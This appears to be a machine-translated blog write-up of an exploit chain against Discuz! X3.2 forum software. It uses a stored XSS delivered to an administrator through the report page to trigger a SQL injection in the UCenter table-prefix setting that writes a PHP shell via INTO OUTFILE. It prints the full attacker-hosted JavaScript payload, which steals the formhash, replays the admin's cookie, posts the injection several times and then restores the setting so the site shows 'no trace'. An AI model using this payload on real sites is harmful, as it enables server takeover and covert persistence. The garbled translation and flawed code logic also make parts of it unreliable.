Discuz! X xss rebound background no defense SQL Injection getshell

Discuz! X xss rebound background no defense SQL Injection getshell

Discuz! X xss rebounded without defense against SQL Injection getshell in the background. Here, xss is just a reference, because xss comes from the log function, but this log function is disabled by default. To test this function, we can enable it. This vulnerability should be successful in all dz attacks. I downloaded the latest version, so the test passed ......

First, enable the log function, and then store an xss file:

Test an xss page:

We can go to the article page to see if the task has been executed:

Let's take a look at how to send this to the Administrator. There is a report page below:

Let's take a look at the background report request as an administrator:

This process has been analyzed. Let's take a look at the background and there is no defense for SQL injection:

We will not analyze the code here. The code here is twists and turns. Let's give a picture of the general idea so we can see it clearly.
1. Set the table prefix. The packet capture and replay operations are as follows:

 

2. Modify the table prefix injection:

 

3. Let's monitor the execution process of SQL statements. We can see the cause of this vulnerability.



A. When you click it for the first time, the SQL statement will not be executed, and you can submit it several times more.

B. The data first enters this table:

As you can see, c is filtered out. But when the data is retrieved, This is not escaped and can be directly obtained from the database. Therefore, this vulnerability is caused:

Let's go to this directory to see if the shell we want is generated:

 

In this way, we have figured out how to combine the two items because of the existence of form hash. The idea is as follows:



1. We first perform a get access to the table single page through ajax. We all know that dz will hide a field written into the form as formhash.

2. With this formhash, we can send the ajax request again, send the request five times directly, and then geshell



3. Someone has to ask why the message is sent five times. What are these three messages?

A. the first request is get formhash.

B. the second and third requests are sent to the constructed package. Because this is the first request, it will not succeed. It will use the last packet and then construct the package again. Therefore, the shell can be generated only when the packet is sent twice.

C. Fourth, the five requests are to restore the true nature of the people. The principle is the same here.





Next let's look at our code:



The js content we place on the remote server is as follows:
 

function ajax(){var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++) {try {request = new ActiveXObject(versions[i]); } catch(e) {}  }  }  return request;  }var formhash = '';var cookie = document.cookie;var _x = ajax();  request_get();function request_get() {  src="http://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/admin.php?action=misc&operation=custommenu";data="";xhr_act("GET",src,data);  }function sleep(n){var start=new Date().getTime();while(true) if(new Date().getTime()-start>n) break;}function request_post(flag) {src="http://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/admin.php?action=setting&edit=yes";if(flag == 1){data='\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="formhash"\r\n\r\n3cf53a8d\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="scrolltop"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="anchor"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="operation"\r\n\r\nuc\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][appid]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][key]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][api]"\r\n\r\nhttp://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/uc_server\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][ip]"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][connect]"\r\n\r\nmysql\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbhost]"\r\n\r\nlocalhost\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbuser]"\r\n\r\nroot\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbpass]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbname]"\r\n\r\nultrax\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbtablepre]"\r\n\r\npre_ucenter_vars union select \'<?php phpinfo()?>\' into outfile \'D:/APMSERVER/APMServ5.2.6/www/htdocs/Discuz_X3.2_SC_UTF8/upload/data/shell.php\'#\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[ucactivation]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[fastactivation]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[avatarmethod]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingsubmit"\r\n\r\n提交\r\n-----------------------------2137124919446--';}else{data='\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="formhash"\r\n\r\n3cf53a8d\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="scrolltop"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="anchor"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="operation"\r\n\r\nuc\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][appid]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][key]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][api]"\r\n\r\nhttp://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/uc_server\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][ip]"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][connect]"\r\n\r\nmysql\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbhost]"\r\n\r\nlocalhost\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbuser]"\r\n\r\nroot\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbpass]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbname]"\r\n\r\nultrax\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbtablepre]"\r\n\r\npre_ucenter_\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[ucactivation]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[fastactivation]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[avatarmethod]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingsubmit"\r\n\r\n提交\r\n-----------------------------2137124919446--';}xhr_act("POST",src,data);}  function xhr_act(_m,_s,_a){if(_m == "GET"){_x.open(_m,_s,false);_x.setRequestHeader("Cookie",cookie);  _x.send();  var document_str = _x.responseText;var basestr = 'name="formhash" value="';var formhashpos = basestr.indexOf(basestr);var realpos = formhashpos + basestr.length;formhash = basestr.substr(realpos,8);if(formhash){var count_0 = 3;var count_1 = 3;for(var i=0;i<count_0;i++)request_post(1)sleep(1000);for(var j=0;j<count_1;i++)request_post(0)}}else{_x.open(_m,_s,false);_x.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------2137124919446");_x.setRequestHeader("Cookie",cookie);_x.send(_a);  return _x.responseText; }}

Then, according to the preceding solution, we should generate a shell. php file under that directory.

Finally, our site can still be accessed normally without any trace.